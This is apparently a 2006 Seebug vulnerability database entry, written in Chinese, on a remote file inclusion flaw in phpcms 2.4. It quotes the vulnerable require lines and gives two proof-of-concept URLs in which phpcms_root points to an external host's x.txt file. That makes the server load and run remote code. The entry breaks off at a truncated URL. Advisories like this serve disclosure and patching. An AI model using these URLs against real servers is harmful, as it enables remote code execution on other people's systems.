phpcms 2.4远程文件包含漏洞

2006-12-08T00:00:00
ID SSV:754
Type seebug
Reporter Root
Modified 2006-12-08T00:00:00

Description

guestbook.php漏洞代码如下

require \\\\\\\\'common.php\\\\\\\\'; require $phpcms_root.\\\\\\\\'/include/ubb.php\\\\\\\\';

editor\\\\\\\\admin\\\\\\\\default.php漏洞代码如下:

require \\\\\\\\'../../common.php\\\\\\\\'; require $phpcms_root.\\\\\\\\'/admin/global.php\\\\\\\\';

phpcms 2.4 无

                                        
                                            
                                                http://localhost/phpcms/guestbook.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?<br />
http://localhost/phpcms/editor/admin/default.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?<br />
<br />
<br />
http: